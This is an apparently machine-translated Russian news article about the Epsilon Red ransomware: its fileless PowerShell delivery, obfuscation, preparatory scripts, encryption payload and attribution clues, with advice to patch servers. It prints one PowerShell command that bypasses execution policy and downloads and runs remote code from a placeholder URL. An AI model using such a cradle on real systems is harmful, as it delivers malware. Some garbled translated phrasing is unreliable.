Вы уже пропатчили свои серверы ?
Новая угроза -вымогатель под названием Epsilon Red нацелена на неисправленные серверы Microsoft в корпоративных центрах обработки данных. Названный в честь малоизвестного злодея из комиксов Marvel, Epsilon Red недавно был обнаружен компанией по кибербезопасности Sophos. С момента своего обнаружения программа-вымогатель атаковала многие организации по всему миру.
Бесфайловый вирус-вымогатель «прячется» в PowerShell
Бесфайловые программы-вымогатели — это разновидность вредоносного ПО, которое запускается в комплекте с законным программным обеспечением. Бесфайловое вредоносное ПО на базе PowerShell использует способность PowerShell загружаться непосредственно в память устройства. Эта функция помогает защитить вредоносное ПО в сценариях PowerShell от обнаружения.
В типичном сценарии при выполнении сценария его сначала необходимо записать на диск устройства. Это позволяет решениям по обеспечению безопасности конечных точек обнаруживать сценарии. Поскольку PowerShell исключен из стандартных процессов выполнения сценариев, он может обходить безопасность конечных точек. Кроме того, использование параметра обхода в сценарии PowerShell позволяет злоумышленнику обойти ограничения сетевых сценариев.
Пример параметра обхода PowerShell:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Как видите, разработать параметры обхода PowerShell относительно просто.
В ответ Microsoft выпустила патч для устранения уязвимости удаленного выполнения вредоносного ПО, связанной с PowerShell. Однако патчи эффективны ровно настолько, насколько они используются. Многие организации смягчили стандарты установки исправлений, что сделало их среду уязвимой для атак. Цель Epsilon Red — воспользоваться этим уровнем уязвимости.
Двойная полезность Epsilon Red
Поскольку Epsilon Red наиболее эффективен против необновленных серверов Microsoft, вредоносное ПО можно использовать в качестве вымогателя и инструмента идентификации. Независимо от того, успешен ли Epsilon в среде, злоумышленники получают более полное представление о возможностях безопасности своей цели.
Если Epsilon удалось получить доступ к Microsoft Exchange Server, это означает, что организация не соблюдает общие рекомендации по обеспечению безопасности с помощью исправлений. Для злоумышленника это показывает, насколько легко Epsilon может скомпрометировать остальную среду цели.
Epsilon Red использует затемнение, чтобы скрыть свою полезную нагрузку. Обфускация делает код нечитаемым и используется во вредоносных программах PowerShell, чтобы избежать высокой читаемости сценариев PowerShell. При обфускации используются командлеты -псевдонимы PowerShell , которые затрудняют антивирусному программному обеспечению обнаружение вредоносных сценариев в журналах PowerShell.
Epsilon Red наиболее эффективен против непропатченных серверов Microsoft.
Однако запутанные сценарии PowerShell все равно можно идентифицировать. Распространенным признаком предстоящей атаки PowerShell Script является создание объекта WebClient. Злоумышленник создаст объект WebClient в коде PowerShell, чтобы установить внешнее соединение с удаленным URL-адресом , содержащим вредоносный код.
Если организация подвергается атаке, вероятность того, что она имеет достаточные меры безопасности для обнаружения запутанных сценариев PowerShell, очень мала. И наоборот, если Epsilon Red не удастся проникнуть на сервер, это укажет злоумышленнику на то, что сеть цели может быстро расшифровать вредоносное ПО PowerShell, что сделает атаку менее ценной и более ценной.
Кибер-вторжение Эпсилон Ред
Функционал Epsilon Red очень прост. Программное обеспечение использует серию скриптов Powershell для проникновения на серверы. Эти сценарии PowerShell пронумерованы от 1.ps1 до 12.ps1. Целью каждого сценария PowerShell является подготовка целевого сервера для окончательной полезной нагрузки.
Все сценарии PowerShell в Epsilon Red имеют свое предназначение. Один из сценариев PowerShell в Epsilon Red предназначен для разрешения правил брандмауэра целевой сети. Еще одно программное обеспечение из этой серии, предназначенное для удаления антивирусного программного обеспечения цели .
Как вы могли догадаться, эти сценарии работают синхронно, чтобы гарантировать, что после доставки полезной нагрузки цель не сможет быстро остановить ее продвижение.
Передача полезной нагрузки
Как только сценарии PowerShell от Epsilon освобождают место для своей окончательной полезной нагрузки, они распространяются как расширение Red.exe . При входе на сервер Red.exe сканирует файлы сервера и создает список путей к каталогам для каждого обнаруженного файла. После создания списка дочерние процессы создаются из основного файла вредоносной программы для каждого пути к каталогу в списке. Затем каждый подфайл программы-вымогателя шифрует путь к каталогу из файла списка.
После того, как все пути к папкам в списке Epson будут зашифрованы, останется файл .txt для информирования цели и запроса злоумышленника. Кроме того, все доступные сетевые узлы, подключенные к скомпрометированному серверу, будут скомпрометированы, и вероятность проникновения вредоносного ПО в сеть может возрасти.
Кто стоит за Эпсилон Ред?
Личности нападавших за «Эпсилон Ред» до сих пор неизвестны.
Личности нападавших, стоящих за Эпсилон Ред, до сих пор неизвестны. Однако некоторые улики указывают на происхождение нападавших. Первая подсказка — это название вредоносного ПО. Эпсилон Ред — злодей из «Людей Икс» русского происхождения.
Вторая подсказка заключается в записке о выкупе в файле .txt, который оставил код. Оно похоже на записку, оставленную бандой вымогателей REvil. Однако такое сходство не указывает на то, что нападавшие были членами этой банды. REvil осуществляет операцию RaaS (программа-вымогатель как услуга), в рамках которой филиалы платят REvil за доступ к ее вредоносному ПО.
Защитите себя от Эпсилон Ред
На данный момент Epsilon Red успешно проникает на неисправленные серверы. Это означает, что одна из лучших мер защиты от Epsilon Red и аналогичных вредоносных программ-вымогателей — обеспечить правильное управление вашей средой. Кроме того, наличие решения безопасности, которое может быстро расшифровывать сценарии PowerShell, будет полезным дополнением к вашей среде.
Кэш — это данные предыдущих сеансов приложений и программ, которые операционная система сохраняет, чтобы ускорить загрузку данных в последующих сеансах. Однако после длительного отсутствия очистки кеш заполнит ваш жесткий диск и займет все место на нем.
В этой статье Quantrimang расскажет вам, как узнать, какие типы файлов занимают много места на вашем компьютере с Windows 10.
Yahoo Search — это законная поисковая система. Однако его также считают угонщиком браузера, перенаправляющим пользователей на поиск. йаху. ком. Этот угонщик браузера захватит домашнюю страницу веб-браузера и настройки поисковой системы, чтобы отобразить домашнюю страницу Yahoo Search и поисковую систему вместо домашней страницы и поисковой системы, которые вы ранее настроили.
Завершить задачу — это функция диспетчера задач Microsoft Windows. Он расположен на вкладке «Приложения» и позволяет пользователям закрывать любую отвечающую или не отвечающую программу.
Как и на многих других платформах, в Windows также имеется специализированный менеджер буфера обмена, который называется «История буфера обмена».
Версия Big Sur для macOS была официально анонсирована на недавней конференции WWDC. И вы можете полностью перенести интерфейс macOS Big Sur на Windows 10 с помощью инструмента Rainmeter.
RDStealer — это вредоносное ПО, которое пытается украсть учетные данные и данные путем заражения RDP-сервера и мониторинга его удаленных подключений.
Может быть, пришло время попрощаться с Проводником и использовать стороннее программное обеспечение для управления файлами? Вот 7 лучших альтернатив Windows File Explorer.
LoRaWAN или беспроводная сеть дальнего действия полезна для связи между маломощными устройствами на больших расстояниях.
Перейдя к «Дополнительным параметрам запуска», вы можете сбросить Windows 10, восстановить Windows 10, восстановить Windows 10 из файла образа, который вы создали ранее, исправить ошибки запуска, открыть командную строку для выполнения параметров, выбрать другие, открыть настройки UEFI, изменить настройки запуска. ..
